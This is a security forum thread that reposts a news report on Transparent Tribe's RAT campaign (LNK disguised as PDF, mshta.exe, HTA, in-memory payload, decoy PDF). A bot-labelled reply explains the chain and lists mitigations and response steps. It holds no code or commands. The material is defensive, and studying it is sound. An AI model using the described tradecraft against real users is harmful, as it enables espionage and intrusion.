Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia

[Captain Awesome]

Content source

https://thehackernews.com/2026/01/transparent-tribe-launches-new-rat.html?m=1

The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts.

"The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion," CYFIRMA said in a technical report.

Transparent Tribe, also called APT36, is a hacking group that's known for mounting cyber espionage campaigns against Indian organizations. Assessed to be of Indian origin, the state-sponsored adversary has been active since at least 2013.

The threat actor boasts of an ever-evolving arsenal of RATs to realize its goals. Some of the trojans put to use by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.

The latest set of attacks began with a spear-phishing email containing a ZIP archive with a LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML Application (HTA) script using "mshta.exe" that decrypts and loads the final RAT payload directly in memory. In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users' suspicion.

 

[Bot]

This write-up describes a fairly common (and effective) APT tradecraft chain: LNK → mshta.exe → decrypted in-memory RAT + decoy PDF. The key point is that the “PDF” the user thinks they opened is actually a Windows shortcut, and the real payload is staged through script execution and memory-loading to reduce obvious on-disk artifacts.

What’s happening (high level)

• Initial lure: Spear-phishing email delivers a ZIP containing an .LNK that visually mimics a PDF (icon/name).
• Execution: The LNK launches mshta.exe to run a remote or dropped .HTA (HTML Application).
• Staging: The HTA decrypts/loads the RAT in memory (often to evade simple file-based scanning).
• Distraction: A decoy PDF is opened to make the user think nothing suspicious happened.
• Outcome: A RAT typically provides persistence + remote control (process execution, file access, credential/data theft depending on the family).

Why this is important defensively

• LNK files are “low friction” for users (double-clickable) and can hide their true behavior.
• mshta.exe is a legitimate Windows binary often abused as a “LOLBIN” (living-off-the-land) to run script-based payloads.
• In-memory loading can reduce the number of obvious malware files left behind, increasing reliance on behavior/telemetry detections.

Practical mitigations (Windows / enterprise-friendly)

• Block or heavily restrict mshta.exe where possible (AppLocker/WDAC). If you can’t block it outright, alert on it and restrict outbound network access for it.
• Enable Microsoft Defender Attack Surface Reduction (ASR) rules (especially rules that block Office from creating child processes, block executable content from email/web, and block suspicious scripting behaviors). Test in audit first if needed.
• Mark-of-the-Web (MOTW) enforcement: Ensure downloads retain MOTW so Windows/Defender/SmartScreen apply stricter checks to files from the internet (including archives where applicable).
• Email gateway controls: Quarantine or strip ZIP attachments containing LNK/HTA (and consider blocking HTA outright at the mail perimeter).
• User-facing hardening: Show full file extensions in Explorer and train users that “PDF” files should be .pdf, not .lnk (attackers rely on hidden extensions).
• Monitoring: Alert on process chains like explorer.exe → mshta.exe, mshta reaching external URLs, and unusual child processes spawned shortly after.

If someone already opened a suspected LNK

• Disconnect the machine from the network (or at least isolate it) to reduce potential C2 activity.
• Do not continue opening/“testing” the file.
• Collect basics: the ZIP/LNK sample, email headers, and relevant endpoint telemetry (Defender logs, EDR events, process tree).
• Submit the sample to VirusTotal (if policy allows) and/or your internal sandbox, and share hashes/IOCs with your SOC.
• If you want forum help, post in the appropriate MalwareTips malware removal/help section with the requested logs (FRST logs are commonly used here) and avoid posting sensitive documents publicly.

Key takeaway
Treat LNK-in-ZIP + mshta/HTA as a high-risk phishing pattern. The safest path is to prevent execution (blocking/restricting mshta and risky attachment types) and to rely on behavioral detection/telemetry rather than expecting a clean on-disk payload to be easy to find.

 

[Parkinsond]

If they have WHHL, the attack would not initiate at the first place.

If they do not have WHHL but reading MT posts, they would select "show file extensions" in Windows explorer showing the extension lnk file disguised as pdf, and again the attack would not initiate.

We did not use any AV yet.